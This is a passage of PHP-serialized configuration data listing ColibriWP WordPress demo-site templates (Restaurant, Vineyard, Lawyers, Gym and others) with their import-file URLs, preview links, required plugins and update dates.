III\";s:4:\"slug\";s:12:\"business-iii\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-iii/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-iii/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-iii/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/business-iii/screenshot.png\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/business-iii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:17.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:9;a:11:{s:16:\"import_file_name\";s:10:\"Restaurant\";s:4:\"slug\";s:10:\"restaurant\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/restaurant/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/restaurant/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/restaurant/customizer.dat\";s:24:\"import_preview_image_url\";s:92:\"https://static.colibriwp.com/templates-screenshots/colibri_default_restaurant/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/restaurant/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:19.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:10;a:11:{s:16:\"import_file_name\";s:10:\"Vineyard I\";s:4:\"slug\";s:8:\"vineyard\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/vineyard/screenshot.png\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/vineyard-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:22.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:11;a:11:{s:16:\"import_file_name\";s:11:\"Vineyard II\";s:4:\"slug\";s:11:\"vineyard-ii\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard-ii/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/vineyard-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/vineyard-ii/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/vineyard-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:01:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:12;a:11:{s:16:\"import_file_name\";s:9:\"My Resume\";s:4:\"slug\";s:9:\"my-resume\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/my-resume/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/my-resume/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/my-resume/customizer.dat\";s:24:\"import_preview_image_url\";s:91:\"https://static.colibriwp.com/templates-screenshots/colibri_default_my-resume/screenshot.png\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/my-resume/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:24.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:13;a:11:{s:16:\"import_file_name\";s:7:\"Lawyers\";s:4:\"slug\";s:7:\"lawyers\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/lawyers/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/lawyers/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/lawyers/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/lawyers/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/lawyers\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:24.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:14;a:11:{s:16:\"import_file_name\";s:10:\"Conference\";s:4:\"slug\";s:10:\"conference\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/conference/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/conference/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/conference/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/conference/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/conference\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:15;a:11:{s:16:\"import_file_name\";s:17:\"Wedding Planner I\";s:4:\"slug\";s:17:\"wedding-planner-i\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-i/content.xml\";s:22:\"import_widget_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-i/widgets.wie\";s:26:\"import_customizer_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-i/customizer.dat\";s:24:\"import_preview_image_url\";s:83:\"https://static.colibriwp.com/templates-screenshots/wedding-planner-i/screenshot.jpg\";s:11:\"preview_url\";s:54:\"https://colibriwp-work.colibriwp.com/wedding-planner-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:12.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:16;a:11:{s:16:\"import_file_name\";s:18:\"Wedding Planner II\";s:4:\"slug\";s:18:\"wedding-planner-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-ii/content.xml\";s:22:\"import_widget_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/wedding-planner-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:84:\"https://static.colibriwp.com/templates-screenshots/wedding-planner-ii/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/wedding-planner-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:27.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:17;a:11:{s:16:\"import_file_name\";s:12:\"Architecture\";s:4:\"slug\";s:12:\"architecture\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/architecture/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/architecture/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/architecture/customizer.dat\";s:24:\"import_preview_image_url\";s:94:\"https://static.colibriwp.com/templates-screenshots/colibri_default_architecture/screenshot.png\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/architecture/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:27.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:18;a:11:{s:16:\"import_file_name\";s:6:\"Barber\";s:4:\"slug\";s:6:\"barber\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/barber/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/barber/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/barber/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-21/screenshot.jpg\";s:11:\"preview_url\";s:43:\"https://colibriwp-work.colibriwp.com/barber\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-03-22 09:05:40.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:19;a:11:{s:16:\"import_file_name\";s:8:\"Coffee I\";s:4:\"slug\";s:8:\"coffee-i\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-i/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-i/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-i/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/coffee-i/screenshot.png\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/coffee-i\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:18.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:20;a:11:{s:16:\"import_file_name\";s:9:\"Coffee II\";s:4:\"slug\";s:9:\"coffee-ii\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-ii/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coffee-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/coffee-ii/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/coffee-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:20.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:21;a:11:{s:16:\"import_file_name\";s:15:\"Interior Design\";s:4:\"slug\";s:15:\"interior-design\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/interior-design/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/interior-design/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/interior-design/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/interior-design/screenshot.png\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/interior-design\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:33.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:22;a:11:{s:16:\"import_file_name\";s:4:\"Yoga\";s:4:\"slug\";s:4:\"yoga\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/yoga/content.xml\";s:22:\"import_widget_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/yoga/widgets.wie\";s:26:\"import_customizer_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/yoga/customizer.dat\";s:24:\"import_preview_image_url\";s:70:\"https://static.colibriwp.com/templates-screenshots/yoga/screenshot.png\";s:11:\"preview_url\";s:41:\"https://colibriwp-work.colibriwp.com/yoga\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:32.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:23;a:11:{s:16:\"import_file_name\";s:13:\"Constructions\";s:4:\"slug\";s:13:\"constructions\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/constructions/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/constructions/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/constructions/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/constructions/screenshot.png\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/constructions\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:35.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:24;a:11:{s:16:\"import_file_name\";s:11:\"Pets Clinic\";s:4:\"slug\";s:11:\"pets-clinic\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pets-clinic/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pets-clinic/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pets-clinic/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/pets-clinic/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/pets-clinic\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:37.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:25;a:11:{s:16:\"import_file_name\";s:10:\"Ski Resort\";s:4:\"slug\";s:10:\"ski-resort\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/ski-resort/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/ski-resort/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/ski-resort/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/ski-resort/screenshot.png\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/ski-resort\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:26;a:11:{s:16:\"import_file_name\";s:18:\"Creative Agency II\";s:4:\"slug\";s:18:\"creative-agency-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/creative-agency-ii/content.xml\";s:22:\"import_widget_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/creative-agency-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:98:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/creative-agency-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:84:\"https://static.colibriwp.com/templates-screenshots/creative-agency-ii/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/creative-agency-ii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:27;a:11:{s:16:\"import_file_name\";s:5:\"Sushi\";s:4:\"slug\";s:5:\"sushi\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/sushi/content.xml\";s:22:\"import_widget_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/sushi/widgets.wie\";s:26:\"import_customizer_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/sushi/customizer.dat\";s:24:\"import_preview_image_url\";s:71:\"https://static.colibriwp.com/templates-screenshots/sushi/screenshot.png\";s:11:\"preview_url\";s:42:\"https://colibriwp-work.colibriwp.com/sushi\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:44:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:28;a:11:{s:16:\"import_file_name\";s:22:\"Designer Portfolio III\";s:4:\"slug\";s:22:\"designer-portfolio-iii\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-iii/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-iii/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-portfolio-iii/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/designer-portfolio-iii/screenshot.png\";s:11:\"preview_url\";s:59:\"https://colibriwp-work.colibriwp.com/designer-portfolio-iii\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:29;a:11:{s:16:\"import_file_name\";s:3:\"Gym\";s:4:\"slug\";s:3:\"gym\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gym/content.xml\";s:22:\"import_widget_file_url\";s:80:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gym/widgets.wie\";s:26:\"import_customizer_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gym/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/colibri_default_gym/screenshot.png\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/gym-demo/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-02 14:51:46.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:30;a:11:{s:16:\"import_file_name\";s:9:\"Religious\";s:4:\"slug\";s:9:\"religious\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/religious/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/religious/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/religious/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/religious/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/religious/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:34.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:31;a:11:{s:16:\"import_file_name\";s:14:\"Medical Clinic\";s:4:\"slug\";s:17:\"medical-clinic-ii\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/medical-clinic-ii/content.xml\";s:22:\"import_widget_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/medical-clinic-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/medical-clinic-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:83:\"https://static.colibriwp.com/templates-screenshots/medical-clinic-ii/screenshot.png\";s:11:\"preview_url\";s:55:\"https://colibriwp-work.colibriwp.com/medical-clinic-ii/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:36.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:32;a:11:{s:16:\"import_file_name\";s:5:\"Detox\";s:4:\"slug\";s:5:\"detox\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/detox/content.xml\";s:22:\"import_widget_file_url\";s:82:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/detox/widgets.wie\";s:26:\"import_customizer_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/detox/customizer.dat\";s:24:\"import_preview_image_url\";s:71:\"https://static.colibriwp.com/templates-screenshots/detox/screenshot.png\";s:11:\"preview_url\";s:43:\"https://colibriwp-work.colibriwp.com/detox/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:37.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:33;a:11:{s:16:\"import_file_name\";s:6:\"School\";s:4:\"slug\";s:6:\"school\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/school/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/school/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:39.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:34;a:11:{s:16:\"import_file_name\";s:6:\"Movers\";s:4:\"slug\";s:6:\"movers\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/movers/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/movers/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/movers/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/movers/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/movers/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 